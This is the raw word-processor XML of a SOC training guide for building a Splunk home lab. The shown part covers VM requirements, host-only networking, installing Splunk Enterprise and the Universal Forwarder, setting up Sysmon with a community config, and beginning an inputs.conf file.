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o42n0tatwqvx" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC Training - Building Splunk lab for Logs ingestion, Monitor , Attack simulation &amp; Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eismv4vkob8j" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1: Requirements &amp; Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n74fhg4d2957" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hypervision Software: VMware Workstation, VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 11 ISO: Download from microsoft official page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu 22.04 Server/Desktop ISO: Download from Ubuntu official page, Desktop is recommended for visualizing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux: Download from Kali linux official site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk Enterprise: Download from Splunk official site, free version trial for 60 days (should be enough for a lab project).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk Universal Forwarder: Download from Splunk official site for logs collecting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other tools: Sysmon, pfSense (optional).</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pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ign219w5u51k" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROM: &gt;= 100GB spare space</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RAM: &gt;= 16GB for a smooth workflow</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ic4w5r6u3u6o" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 2: Implementation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wr6a23lop6vd" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this lab, I will be using host-only network to ensure consistency and reliable connection between the VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open VMware Workstation Pro, go to Edit -&gt; Virtual Network Editor</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3400425" cy="1800225"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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400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731200" cy="57277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pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_amuylz2xxijl" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before install and configure anything, we need to set up the host virtual machine first, for the Splunk Server, I choose Ubuntu 22.04 as the host OS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu set up:</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ISO Ubuntu 22.04.05 LTS</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Ram &gt;= 4GB</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CPU &gt;= 2 core</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage &gt;= 35GB </w:t>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731200" cy="57912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26"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows set up:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ram &gt;= 4GB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU &gt;= 2 core</w:t>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Storage &gt;= 60GB</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731200" cy="5803900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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27"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After finish set up the 3 VMs, test their connection</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1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>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Ping from the Windows machine to Ubuntu</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731200" cy="1714500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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Ping from windows machine to Kali.</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731200" cy="15240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Ping from the Ubuntu machine to the Window machine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731200" cy="1574800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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Ping from Ubuntu machine to Kali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31200" cy="1879600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>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Ping from Kali machine to Ubuntu.</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731200" cy="1930400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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1200" cy="1930400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ping from Kali machine to Windows.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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i2xpme734xc4" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Splunk Server Download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Ubuntu machine, access Splunk's official site and create an account (each account only has a 60 days trial).</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1200" cy="2806700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy .deb wget link, then open a terminal and paste it in, it should be something like this:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wget -O splunk-10.0.1-c486717c322b-linux-amd64.deb "</w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://download.splunk.com/products/splunk/releases/10.0.1/linux/splunk-10.0.1-c486717c322b-linux-amd64.deb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract everything, if everything goes well, it should display a “complete” message as in the picture below.</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731200" cy="15494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18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run Splunk for the first time using command sudo /opt/splunk/bin/splunk start, accept license, create a username and password to login Splunk.</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2959100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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31200" cy="29718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35"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If everything run smoothly, you can start using the Splunk home page.</w:t>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731200" cy="28194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Next, configure Splunk to monitor the Ubuntu machine (Splunk’s host machine), this will include several system logs such as auth.log, syslog, kern.log,etc.</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19050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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bs3iits98lf3" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u0kvwfunxxu9" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Install Splunk Universal Forwarder for remote data collection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Splunk Universal Forwarder on Splunk official site</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731200" cy="28067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6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download and run the .msi file, and configure it to forward data to the Splunk server machine (make sure to get the IP right).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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xcvzemkeynli" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Sysmon Installation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Sysmon to have enhanced standard logging capabilities ad Extract it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before running Sysmon, make sure to have a Sysmon configuration file first. Go to SwiftOnSecurity and make a copy of the configuration. </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SwiftOnSecurity/sysmon-config: Sysmon configuration file template with default high-quality event tracing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Place the configuration file in the same folder as the Sysmon’s exe file</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13970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5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, run it with command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./Sysmon64.exe -accepeula -i sysmonconfig.xml</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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y4vr01q0tbse" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Configure Splunk UF to collect data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files\SplunkUniversalForwarder\etc\system\local, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you should see a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inputs.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, if not, create one and paste in the following lines.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Windows platform specific input processor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#[WinEventLog://Application]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
